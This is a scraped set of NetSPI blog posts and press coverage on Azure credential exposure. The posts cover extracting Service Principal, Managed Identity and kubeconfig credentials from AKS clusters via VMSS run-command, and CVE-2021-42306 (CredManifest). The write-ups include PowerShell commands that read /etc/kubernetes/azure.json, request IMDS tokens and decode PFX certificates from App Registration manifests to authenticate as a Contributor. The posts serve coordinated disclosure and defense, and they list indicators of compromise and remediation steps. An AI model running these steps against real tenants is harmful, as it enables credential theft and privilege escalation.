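One quick way to spot these node resource groups is the naming convention itself; a minimal sketch, assuming your Az version supports wildcards on the -Name parameter:

# Sketch: find AKS node resource groups by their MC_<rg>_<cluster>_<region> pattern
Get-AzResourceGroup -Name "MC_*" | Select-Object ResourceGroupName, Location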

Gathering Service Principal Credentials

First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.

In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.

The VMSS command execution can be done via the following options:

The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.

In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function. 
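
A manual version of that process looks roughly like this; the resource group, VMSS name, and instance Id are placeholders for the values in the cluster’s MC_ resource group:

# Sketch: cat the azure.json file from a VMSS instance via Run Command
"cat /etc/kubernetes/azure.json" | Out-File -FilePath .\tempscript -Encoding ASCII
Invoke-AzVmssVMRunCommand -ResourceGroupName "MC_tester_testCluster_eastus" `
    -VMScaleSetName "<aks-nodepool-vmss>" -InstanceId "0" `
    -CommandId "RunShellScript" -ScriptPath .\tempscript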

Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.

Privilege Escalation Potential

There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.

In this example:

  • User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
  • User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
  • User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
  • User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on

This is illustrated in the diagram below.

Privilege Escalation Potential diagram

For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).

Gathering Managed Identity Credentials

If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in the following blogs:

In this case, we will be using the VMSS command execution functionality to make a request to “http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/”. This will return a JWT that is scoped to the management.azure.com domain.
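
Run from (or via run command on) a VMSS instance, the request itself is a single call; a minimal sketch:

# Sketch: request a management-plane token from the instance metadata service
# (IMDS is only reachable from inside the VM)
Invoke-RestMethod -Headers @{ Metadata = "true" } `
    -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"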

For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (i.e., Key Vaults), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.

At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.

Gathering kubectl Credentials

As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.

Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.
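
A hedged sketch of that REST approach follows; the subscription, resource group, and cluster names are placeholders, and the API version and response shape follow the documented listClusterAdminCredential action:

# Sketch: generate an admin kubeconfig via the ARM REST API with an Az token
$token = (Get-AzAccessToken).Token
$uri   = "https://management.azure.com/subscriptions/<sub-id>/resourceGroups/<rg>" +
         "/providers/Microsoft.ContainerService/managedClusters/<cluster>" +
         "/listClusterAdminCredential?api-version=2021-05-01"
$resp  = Invoke-RestMethod -Method Post -Uri $uri -Headers @{ Authorization = "Bearer $token" }
# The kubeconfig comes back Base64-encoded in the response
[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($resp.kubeconfigs[0].value)) |
    Out-File .\kubeconfig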

Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.

Conclusion

As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.

For the defenders reading this, Microsoft Security Center should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:

  • VMSS Command Execution
  • Issuing of Metadata tokens for Managed Identities
  • Generation of kubeconfig files

For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.

Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.

[post_title] => How To Extract Credentials from Azure Kubernetes Service (AKS) [post_excerpt] => In this penetration testing blog, we explain how to extract credentials from the Azure Kubernetes Service (AKS) using the Contributor role permissions on an AKS cluster. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extract-credentials-from-azure-kubernetes-service [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:22:34 [post_modified_gmt] => 2023-03-16 14:22:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27255 [menu_order] => 253 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 26753 [post_author] => 10 [post_date] => 2021-11-23 13:16:00 [post_date_gmt] => 2021-11-23 19:16:00 [post_content] =>

On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. Read the full article below or online here.

Microsoft has fixed a flaw in Azure that, according to the infosec firm that found and privately reported the issue, could be exploited by a rogue user within an Azure Active Directory instance "to escalate up to a Contributor role."

"If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription," NetSPI said of the vulnerability, labeled CVE-2021-42306.

Essentially, an employee at a company using Azure Active Directory, for instance, could end up exploiting this bug to ruin an IT department or CISO's month. Microsoft said last week it fixed the problem within Azure:

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers.

We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

"The discovery of this vulnerability," said NetSPI's Karl Fosaaen, who found the security hole, "highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test."

[post_title] => The Register: Microsoft squashes Azure privilege-escalation bug [post_excerpt] => On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-register-microsoft-squashes-azure-privilege-escalation-bug [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:42 [post_modified_gmt] => 2022-12-16 16:51:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26753 [menu_order] => 280 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 26727 [post_author] => 10 [post_date] => 2021-11-18 18:47:00 [post_date_gmt] => 2021-11-19 00:47:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. Read the full article below or online here.

Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.

The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.

As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

Product/Service: Azure Automation (uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created)
Microsoft’s Mitigation: Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action.
Customer impact assessment and remediation: Automation Run As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately, customers who bring their own certificates could be affected, regardless of the renewal date of the certificate. To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this Github Repo. In addition, Azure Automation supports Managed Identities (GA announced in October 2021); migrating from Run-As to Managed Identities will mitigate this issue. Please follow the guidance here to migrate.

Product/Service: Azure Migrate (creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints)
Microsoft’s Mitigation: Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications. Azure Migrate appliances that were registered after 11/02/2021 and had Appliance configuration manager version 6.1.220.1 and above are not impacted and do not require further action.
Customer impact assessment and remediation: Azure Migrate appliances registered prior to 11/02/2021, and/or appliances registered after 11/02/2021 where auto-update was disabled, could be affected by this issue. To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.

Product/Service: Azure Site Recovery (ASR; creates Azure AD applications to communicate with the ASR service endpoints)
Microsoft’s Mitigation: Azure Site Recovery deployed an update to prevent private key data from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action.
Customer impact assessment and remediation: Customers who have deployed and registered the preview version of the VMware to Azure DR experience with ASR before 11/01/2021 could be affected. To identify and remediate the impacted AAD Apps associated with Azure Site Recovery appliances, please navigate to this link.

Product/Service: Azure AD applications and Service Principals [1]
Microsoft’s Mitigation: Microsoft has blocked reading private key data as of 10/30/2021.
Customer impact assessment and remediation: Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

  • Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
  • If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
  • Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
  • Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
  • For more information refer to the security operations guidance.

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.

[post_title] => ChannelPro Network: Azure Active Directory (AD) KeyCredential Property Information Disclosure [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => channelpro-network-azure-active-directory-ad-keycredential-property-information-disclosure [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26727 [menu_order] => 283 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 26733 [post_author] => 10 [post_date] => 2021-11-18 17:26:00 [post_date_gmt] => 2021-11-18 23:26:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. Read the full article below or online here.

Microsoft has recently addressed an information disclosure vulnerability, tracked as CVE-2021-42306, affecting Azure AD.

“An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.” reads the advisory published by Microsoft. “Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application. Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.”

The vulnerability was discovered by Karl Fosaaen from NetSPI, it received a CVSS score of 8.1. Fosaaen explained that due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and anyone with access to information on App Registrations can access them.

An attacker could use these credentials to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

“This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.” reads the analysis published by NetSPI.

An attacker can exploit this flaw to escalate privileges to Contributor of any subscription that has an Automation Account, then access resources in the affected subscriptions, including sensitive information stored in Azure services and credentials stored in key vaults.

The issue could be potentially exploited to disable or delete resources and take entire Azure tenants offline.

Microsoft addressed the flaw by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been stored in clear text.

[post_title] => Security Affairs: Microsoft addresses a high-severity vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => security-affairs-microsoft-addresses-a-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26733 [menu_order] => 282 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 26728 [post_author] => 10 [post_date] => 2021-11-18 16:14:00 [post_date_gmt] => 2021-11-18 22:14:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. Read the full article below or online here.

Microsoft announced on Wednesday that it fixed an Azure Active Directory private key data storage gaffe that affects Azure application subscribers, but affected organizations nonetheless should carry out specific assessment and remediation tasks.

Affected organizations were notified via the Azure Service Health Notifications message center, Microsoft indicated.

"We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use."

The applications requiring investigation include Azure Automation (when used with "Run-As Accounts"), Azure Migrate, Azure Site Recovery, and Azure AD Applications and Service Principals. Microsoft didn't find evidence that the vulnerability was exploited, but advised organizations to conduct audits and investigate Azure apps for any permissions that may have been granted.

Microsoft also urged IT pros to enforce least-privilege access for apps and check the "sign-in logs, AAD audit logs and M365 audit logs for anomalous activity like sign-ins from unexpected IP addresses."

Private Key Data Exposed

The problem, in essence, was that Microsoft's Azure app installation processes were including private key data in a property used for public keys. The issue was initially flagged as CVE-2021-42306, an information disclosure vulnerability associated with Azure AD's keyCredentials property. Any user in an Azure AD tenancy can read the keyCredentials property, Microsoft's announcement explained:

The keyCredentials property is used to configure an application's authentication credentials. It is accessible to any user or service in the organization's Azure AD tenant with read access to application metadata.

The keyCredentials property is supposed to just work with public keys, but it was possible to store private key data in it, too, and that's where the Microsoft Azure app install processes blundered.

"Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers," Microsoft explained.

The Microsoft Security Response Center (MSRC) credited the discovery of the issue to "Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe," the announcement indicated. 

Contributor Role Rights

The magnitude of the problem was explained in a NetSPI press release. NetSPI specializes in penetration testing and attack surface reduction services for organizations.

An exploit of the CVE-2021-42306 vulnerability could give an attacker Azure Contributor role rights, with the ability to "create, manage, and delete all types of resources in the affected Azure subscription," NetSPI explained. An attacker would have access to "all of the resources in the affected subscriptions," including "credentials stored in key vaults."

NetSPI's report on the vulnerability, written by Karl Fosaaen, NetSPI's practice director, described the response by the MSRC as "one of the fastest" he's seen. Fosaaen had initially sent his report to the MSRC on Oct. 7, 2021.

Fosaaen advised following MSRC's advice, but added a cautionary note.

"Although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account 'Run as' certificates," he wrote. "Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised." 

Microsoft offers a script from this GitHub page that will check for affected apps, as noted by Microsoft Program Manager Merill Fernando in this Twitter post.

[post_title] => Redmond: Microsoft Fixes Azure Active Directory Issue Exposing Private Key Data [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => redmond-microsoft-fixes-azure-active-directory-issue-exposing-private-key-data [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26728 [menu_order] => 284 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 26730 [post_author] => 10 [post_date] => 2021-11-18 15:19:00 [post_date_gmt] => 2021-11-18 21:19:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Octavio Mares for Information Security Newspaper. Read the full article below or online here.

This week, Microsoft reported the detection of a sensitive information leak vulnerability that affects many Azure Active Directory (AD) deployments. The flaw was tracked as CVE-2021-42306 and received a score of 8.1/10 according to the Common Vulnerability Scoring System (CVSS).

According to the report, incorrect configuration in Azure allows “Run As” credentials in the automation account to be stored in plain text, so any user with access to application registration information could access this information, including threat actors.

CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory

The flaw was identified by researchers at cybersecurity firm NetSPI, who mention that an attacker could exploit this condition to perform privilege escalation on any affected implementation. The risk is also present for credentials stored in key vaults and any information stored in Azure services, experts say.

Apparently, the flaw is related to the keyCredentials property, designed to configure authentication credentials for applications. Microsoft said: “Some Microsoft services incorrectly store private key data in keyCredentials while building applications on behalf of their customers. At the moment there is no evidence of malicious access to this data.”

The company notes that the vulnerability was fixed by preventing Azure services from storing private keys in plain text in keyCredentials, as well as preventing users from accessing any private key data incorrectly stored in this format: “Private keys in keyCredentials are inaccessible, which mitigates the risk associated with storing this information,” Microsoft concludes.

Microsoft also mentions that all Automation Run As accounts that were created with Azure Automation certificates between October 15, 2020 and October 15, 2021 are affected by this flaw. Azure Migrate services and customers who deployed the VMware to Azure disaster recovery preview experience with Azure Site Recovery (ASR) could also be vulnerable.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.

[post_title] => Information Security Newspaper: Very Critical Information Disclosure Vulnerability in Azure Active Directory (AD). Patch Immediately [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => information-security-newspaper-very-critical-information-disclosure-vulnerability-in-azure-active-directory-ad-patch-immediately [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26730 [menu_order] => 285 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 26710 [post_author] => 10 [post_date] => 2021-11-18 14:34:36 [post_date_gmt] => 2021-11-18 20:34:36 [post_content] =>

On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. Read the full article below or online here.

A critical Azure Active Directory vulnerability (CVE-2021-42306) left user credentials stored in easily accessible plain text – a bug that could have let attackers make themselves a contributor to the affected Azure AD subscription, creating, managing and deleting resources across the cloud-based IAM service; which, abused, hands a potentially terrifying amount of control to any bad actor who’s gained access.

The Azure Active Directory vulnerability resulted in private key data being stored in plaintext by four key Azure services in the keyCredentials property of an Azure AD application. (The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata, Microsoft noted in its write-up.)

Azure Automation, Azure Migrate, Azure Site Recovery and Azure applications and Service Principals were all storing their private keys visibly in the public property, Microsoft admitted.

“Automation Account ‘Run as’ credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users)” said attack surface management specialist NetSPI.

The bug was spotted and reported by security firm NetSPI’s practice director Karl Fosaaen.

(His technically detailed write-up can be seen here.)

Microsoft gave it a CVSS score of 8.1 and patched it on November 17 in an out-of-band security update.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

Impacted Azure services have now deployed updates that prevent clear text private key data from being stored during application creation, and Azure AD deployed an update that prevents access to private key data that has previously been stored. NetSPI’s Fosaaen warned however that “although Microsoft has updated the impacted Azure services, I recommend cycling any existing Automation Account ‘Run as’ certificates. Because there was a potential exposure of these credentials, it is best to assume that the credentials may have been compromised.”

There’s no evidence that the bug has been publicly exploited and it would require basic authorisation, but for a motivated attacker it would have represented a significant weapon in their cloud-exploitation arsenal and raises questions about QA at Microsoft given the critical nature of the exposure.

Microsoft described the Azure Active Directory vulnerability in its security update as “an information disclosure vulnerability [that] manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal….

“This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application” it added.

In a separate blog by Microsoft Security Response Center the company noted that “access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal” — something illustrated and automated by NetSPI’s Karl Fosaaen.

It’s not Azure’s first serious security issue this year: security researchers at Israel’s Wiz in August 2021 found a critical vulnerability in its flagship CosmosDB database that gave them full admin access for major Microsoft customers including several Fortune 500 multinationals. They warned at the time that the “series of flaws in a Cosmos DB feature created a loophole allowing any user to download, delete or manipulate a massive collection of commercial databases, as well as read/write access to the underlying architecture of Cosmos DB.”

[post_title] => The Stack: “Keys to the cloud” stored in plain text in Azure AD in major hyperscaler blooper [post_excerpt] => On November 18, 2021, NetSPI Practice Director Karl Fosaaen was featured in an article on The Stack. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-stack-keys-to-the-cloud-stored-in-plain-text-in-azure-ad-in-major-hyperscaler-blooper [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:44 [post_modified_gmt] => 2022-12-16 16:51:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26710 [menu_order] => 286 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 26684 [post_author] => 10 [post_date] => 2021-11-17 14:13:03 [post_date_gmt] => 2021-11-17 20:13:03 [post_content] =>

Introduction

Occasionally, we find something in an environment that just looks off. It’s not always abundantly clear why it looks wrong, but it is clear that a deeper understanding is required. That was the case when we saw Base64 certificate data (“MII…” strings) stored with App Registration “manifests” in Azure Active Directory.

In this blog, we will share the technical details on how we found and reported CVE-2021-42306 (CredManifest) to Microsoft. In addition to Microsoft’s remediation guidance, we’ll explain the remediation steps organizations can take to protect their Azure environments.

So, what does this mean for your organization? Read our press release to explore the business impact of the issue.

TL;DR

Due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) were being stored in cleartext, in Azure Active Directory (AAD). These credentials were available to anyone with the ability to read information about App Registrations (typically most AAD users). These credentials could then be used to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

The Source of the Issue

This issue stems from the way the Automation Account “Run as” credentials are created when a new Automation Account is set up in Azure. There appears to have been logic on the Azure side that stored the full PFX file in the App Registration manifest, rather than just the associated public key.

We can see this by creating a new Automation Account with a “Run as” account in our test tenant. As an integrated part of this process, we are assigning the Contributor role to the “Run as” account, so we will need to use an account with the Owner role to complete this step. We will use the “BlogExample” Automation Account as our example:

Add Automation Account

Take note that we are also setting the “Create Azure Run As account” option to “Yes” for this example. This will create a new service principal account that the Automation Account can use when running scripts. By default, this service principal will also be granted the Contributor role on the subscription that the Automation Account is created in.

We’ve previously covered Automation Accounts on the NetSPI technical blog, so hopefully this is all a refresher. Our earlier posts have additional background on Azure Automation Accounts.

New Azure Run As account (service principal) created

Once the Automation and “Run as” Accounts are created, we can then see the new service principal in the App Registrations section of the Azure Active Directory blade in the Portal.

By selecting the display name, we can then see the details for the App Registration and navigate to the “Manifest” section. Within this section, we can see the “keyCredentials”.

The “value” parameter is the Base64 encoded string containing the PFX certificate file that can be used for authentication. Before we can authenticate as the App Registration, we will need to convert that Base64 data back into a PFX file.

Manual Extraction of the Credentials

For the proof of concept, we will copy the certificate data out of the manifest and convert it to a PFX file.

This can be done with two lines of PowerShell:

$testcred = "MIIJ/QIBAzCCC[Truncated]="

[IO.File]::WriteAllBytes("$PWD\BlogCert.pfx",[Convert]::FromBase64String($testcred))

This will decode the certificate data to BlogCert.pfx in your current directory.

Next, we will need to import the certificate to our local store. This can also be done with PowerShell (in a local administrator session):

Import-PfxCertificate -FilePath "$PWD\BlogCert.pfx" -CertStoreLocation Cert:\LocalMachine\My

Finally, we can use the newly installed certificate to authenticate to the Azure subscription as the App Registration. This will require us to know the Directory (Tenant) ID, App (Client) ID, and Certificate Thumbprint for the App Registration credentials. These can be found in the “Overview” menu for the App Registration and the Manifest. 

In this example, we’ve cast these values to PowerShell variables ($thumbprint, $tenantID, $appId).

With these values available, we can then run the Add-AzAccount command to authenticate to the tenant. 

Add-AzAccount -ServicePrincipal -Tenant $tenantID -CertificateThumbprint $thumbprint -ApplicationId $appId

As we can see, the results of Get-AzRoleAssignment for our App Registration shows that it has the Contributor role in the subscription.

Automating Extraction

Since we’re penetration testers and want to automate all our attacks, we wrote up a script to help identify additional instances of this issue in tenants. The PowerShell script uses the Graph API to gather the manifests from AAD and extract the credentials out to files.

The script itself is simple, but it uses the following logic (a rough sketch follows the list):

  1. Get a token and query the following endpoint for App Registration information: “https://graph.microsoft.com/v1.0/myorganization/applications/”
  2. For each App Registration, check the “keyCredentials” value for data and write it to a file
  3. Use the Get-PfxData PowerShell function to validate that it’s a PFX file
  4. Delete any non-PFX files and log the display name and ID for affected App Registrations to a file for tracking
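
To make that logic concrete, here's a minimal sketch of the approach. This is not the actual MicroBurst script; it assumes you already have a Microsoft Graph access token in $token, and it ignores API paging:

# Minimal sketch (not the MicroBurst script): $token is assumed to be a valid Graph token
$headers = @{ Authorization = "Bearer $token" }
$apps = (Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/myorganization/applications/" -Headers $headers).value
foreach ($app in $apps) {
    foreach ($cred in $app.keyCredentials) {
        if ($cred.key) {
            # Write the Base64-decoded credential data out to a candidate PFX file
            $file = "$PWD\$($app.id).pfx"
            [IO.File]::WriteAllBytes($file, [Convert]::FromBase64String($cred.key))
            try {
                # Get-PfxData only succeeds for files that contain private key (PFX) data
                Get-PfxData -FilePath $file -ErrorAction Stop | Out-Null
                "$($app.displayName),$($app.id)" | Out-File -Append .\AffectedApps.txt
            }
            catch { Remove-Item $file }
        }
    }
}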

Impact

For the proof of concept that I submitted to MSRC for this vulnerability, I also created a new user (noaccess) in my AAD tenant. This user did not have any additional roles applied to it, and I was able to use the account to browse to the AAD menu in the Portal and view the manifest for the App Registration. 

By gaining access to the App Registration credential, my new user could then authenticate to the subscription as the Contributor role for the subscription. This is an impactful privilege escalation, as it would allow any user in this environment to escalate to Contributor of any subscription with an Automation Account.

For additional reference, Microsoft’s documentation for default user permissions indicates that this is expected behavior for all member users in AAD: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/users-default-permissions.

Remediation Steps

Below is an overview of how I remediated the issue in a client environment, prior to Microsoft’s fix:

When the “Run as” certificate has been renewed, the new certificate will have its own entry in the manifest. This value will be the public certificate of the new credential.

